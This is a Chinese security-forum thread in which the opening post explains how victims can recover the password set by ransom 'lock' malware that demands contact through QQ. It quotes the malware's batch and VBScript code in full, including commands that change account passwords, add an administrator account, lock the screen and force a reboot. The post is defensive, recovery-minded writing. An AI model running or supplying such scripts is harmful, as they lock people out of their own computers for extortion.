查看: 292005|回复: 1745

如何手动破解敲竹杠病毒(修改电脑开机密码要联系QQ的病...

[复制链接]
  • TA的每日心情
    奋斗
    2021-12-20 19:06
  • 签到天数: 554 天

    [LV.9]以坛为家II

    发表于 2016-1-13 12:22:30 | 显示全部楼层 |阅读模式
    此类病毒目前只有两种形式,一种是基于脚本的文件,分为批处理和vbs脚本等,另一种是PE文件格式的exe程序,基于上术两种情况,现分别讲解破解方法
           脚本病毒破解:


    文件名字随意,文件格式是.bat和.vbs格式,其对应的文件图标分别是 092852wfn99n0m6n9mfcen.png 092859uolojowytlobs6wz.png


    (如果接收到此类文件最后不要直接双击运行,而要编辑方式打开查看内容),这两种文件密码是明文形式,只要右键编辑打开就能找到密码。CF蓝水晶转英雄级.bat文件打开其内容是:
    net user Administrator wsad1234+-    -----wsad1234+-即为Administrator帐号对应的密码
    net user admin zouzou1314520           -----zouzou1314520即为admin 和要密码加753767785$帐号对应密码
    net user 要密码加Q2697588286$ zouzou1314520 /add
    net localgroup administrators 要密码加753767785$ /add
    rundll32 user32,LockWorkStation

    下面对这几行脚本进行简单说明:
    net user Administrator wsad1234+- 更改用户名为Administrator 密码为wsad1234+-
    net user 要密码加Q2697588286$ zouzou1314520 /add  新建一个用户名为要密码加Q2697588286$密码为zouzou1314520的帐户,默认为user组成员。
    net localgroup administrators 要密码加753767785$ /add    把用户名要密码加753767785$添加到administrators 组(管理员组)

    对于vbs文件,其内容如下:
    password="2415123023"
    file=fol & "\net.exe"
    shut=fol & "\shutdown.exe"
    ws.run file & " user %UserName% "+Chr(34) & password & Chr(34),0,True
    ws.run shut & " /r /f /t 0",0
    其密码已经自己写出来了password="2415123023",对就是2415123023。
    综上,脚本病毒更改密码就是使用net user 用户名 密码  的命令

        针对exe格式的可执行文件,需要使用行为监控工具MD来进行破解,首先是安装此软件(下载地址http://dl.pconline.com.cn/download/52312.html),然后在设置里面改成“正常模式”,接着就运行病毒,进行一步一步监控,等到出现对应更改密码命令行,就可以看到密码了,如下qaz123,其更改密码命令还是使用net user 用户名 密码

    MD5设置

    MD5设置


    监控密码更改

    监控密码更改

    评分

    参与人数 2i币 +8 收起 理由
    孤寒h + 3
    黑无常 + 5 这个帖子我承包了

    查看全部评分

    回复

    使用道具 举报

    头像被屏蔽
  • TA的每日心情
    慵懒
    2016-2-28 17:24
  • 签到天数: 72 天

    [LV.6]常住居民II

    发表于 2016-1-13 12:34:27 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2022-11-4 00:00
  • 签到天数: 325 天

    [LV.8]以坛为家I

    发表于 2016-1-13 16:23:15 | 显示全部楼层
    以前的60秒关机也是
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-4-17 20:31
  • 签到天数: 47 天

    [LV.5]常住居民I

    发表于 2016-1-13 19:33:01 | 显示全部楼层
    。。昊情能吃嘛
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2019-2-12 22:05
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2016-1-13 21:22:37 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-1-13 23:43:43 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-3-4 11:35
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2016-1-14 06:47:28 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2022-10-21 10:32
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2016-1-14 09:37:31 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2020-8-18 16:06
  • 签到天数: 153 天

    [LV.7]常住居民III

    发表于 2016-1-14 12:12:59 | 显示全部楼层
    感谢分享--做过实操的确不错。
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2016-1-14 13:02:44 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-19 02:16 , Processed in 0.028130 second(s), 17 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部